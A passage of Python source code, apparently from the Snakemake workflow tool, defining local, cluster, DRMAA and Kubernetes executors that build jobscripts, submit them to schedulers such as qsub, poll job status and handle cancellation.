printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_local_groupid_arg(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = (
job.conda_env.address if self.workflow.use_conda and job.conda_env else None
)
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook if self.dag.is_edit_notebook_job(job) else None,
self.workflow.conda_base_path,
job.rule.basedir,
self.workflow.sourcecache.runtime_cache_path,
)
def run_single_job(self, job):
if (
self.use_threads
or (not job.is_shadow and not job.is_run)
or job.is_template_engine
):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe or service group job.
This lets all items run simultaneously."""
# we only have to consider pipe or service groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
n_non_service = sum(1 for j in job if not j.is_service)
while True:
n_finished = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
n_finished += 1
if n_finished >= n_non_service:
# terminate all service jobs since all consumers are done
for j in job:
if j.is_service:
logger.info(
f"Terminating service job {j.jobid} since all consuming jobs are finished."
)
shell.terminate(j.jobid)
logger.info(
f"Service job {j.jobid} has been successfully terminated."
)
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"{waitfiles_parameter:u} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock {scheduler_solver_path:u} ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
self.exec_job += " {job_specific_args:u} "
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
scheduler_solver_path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
scheduler_solver_path = "--scheduler-solver-path {}".format(
os.path.dirname(sys.executable)
)
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
fd.write("\n".join(wait_for_files))
waitfiles_parameter = format(
"--wait-for-files-file {wait_for_files_file}",
wait_for_files_file=repr(wait_for_files_file),
)
else:
waitfiles_parameter = format(
"--wait-for-files {wait_for_files}",
wait_for_files=[repr(f) for f in wait_for_files],
)
job_specific_args = ""
if job.is_group():
job_specific_args = f"--local-groupid {job.jobid}"
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
waitfiles_parameter=waitfiles_parameter,
scheduler_solver_path=scheduler_solver_path,
job_specific_args=job_specific_args,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cancelcmd=None,
cancelnargs=None,
sidecarcmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.cancelcmd = cancelcmd
self.sidecarcmd = sidecarcmd
self.cancelnargs = cancelnargs
self.external_jobid = dict()
# We need to collect all external ids so we can properly cancel even if
# the status update queue is running.
self.all_ext_jobids = list()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.sidecar_vars = None
if self.sidecarcmd:
self._launch_sidecar()
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def _launch_sidecar(self):
def copy_stdout(executor, process):
"""Run sidecar process and copy it's stdout to our stdout."""
while process.poll() is None and executor.wait:
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
# one final time ...
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
def wait(executor, process):
while executor.wait:
time.sleep(0.5)
process.terminate()
process.wait()
logger.info(
"Cluster sidecar process has terminated (retcode=%d)."
% process.returncode
)
logger.info("Launch sidecar process and read first output line.")
process = subprocess.Popen(
self.sidecarcmd, stdout=subprocess.PIPE, shell=False, encoding="utf-8"
)
self.sidecar_vars = process.stdout.readline()
while self.sidecar_vars and self.sidecar_vars[-1] in "\n\r":
self.sidecar_vars = self.sidecar_vars[:-1]
logger.info("Done reading first output line.")
thread_stdout = threading.Thread(
target=copy_stdout, name="sidecar_stdout", args=(self, process)
)
thread_stdout.start()
thread_wait = threading.Thread(
target=wait, name="sidecar_stdout", args=(self, process)
)
thread_wait.start()
def cancel(self):
def _chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
if self.cancelcmd: # We have --cluster-cancel
# Enumerate job IDs and create chunks. If cancelnargs evaluates to false (0/None)
# then pass all job ids at once
jobids = list(self.all_ext_jobids)
chunks = list(_chunks(jobids, self.cancelnargs or len(jobids)))
# Go through the chunks and cancel the jobs, warn in case of failures.
failures = 0
for chunk in chunks:
try:
cancel_timeout = 2 # rather fail on timeout than miss canceling all
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
subprocess.check_call(
[self.cancelcmd] + chunk,
shell=False,
timeout=cancel_timeout,
env=env,
)
except subprocess.SubprocessError:
failures += 1
if failures:
logger.info(
(
"{} out of {} calls to --cluster-cancel failed. This is safe to "
"ignore in most cases."
).format(failures, len(chunks))
)
else:
logger.info(
"No --cluster-cancel given. Will exit after finishing currently running jobs."
)
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
# Remove SNAKEMAKE_PROFILE from environment as the snakemake call inside
# of the cluster job must run locally (or complains about missing -j).
env.pop("SNAKEMAKE_PROFILE", None)
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
env=env,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = []
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
ret = subprocess.check_output(
"{statuscmd} '{jobid}'".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
env=env,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.append(-e.returncode)
if len(status_cmd_kills) > 10:
logger.info(
"Cluster status command {} was killed >10 times with signal(s) {} "
"(if this happens unexpectedly during your workflow execution, "
"have a closer look.).".format(
self.statuscmd, ",".join(status_cmd_kills)
)
)
status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
suspended_msg = set()
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.jobStatus(active_job.jobid)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
if retval == drmaa.JobState.DONE:
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
elif retval == drmaa.JobState.FAILED:
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
# still running
still_running.append(active_job)
def handle_suspended(by):
if active_job.job.jobid not in suspended_msg:
logger.warning(
"Job {} (DRMAA id: {}) was suspended by {}.".format(
active_job.job.jobid, active_job.jobid, by
)
)
suspended_msg.add(active_job.job.jobid)
if retval == drmaa.JobState.USER_SUSPENDED:
handle_suspended("user")
elif retval == drmaa.JobState.SYSTEM_SUSPENDED:
handle_suspended("system")
else:
try:
suspended_msg.remove(active_job.job.jobid)
except KeyError:
# there was nothing to remove
pass
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Kubernetes jobs.")
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
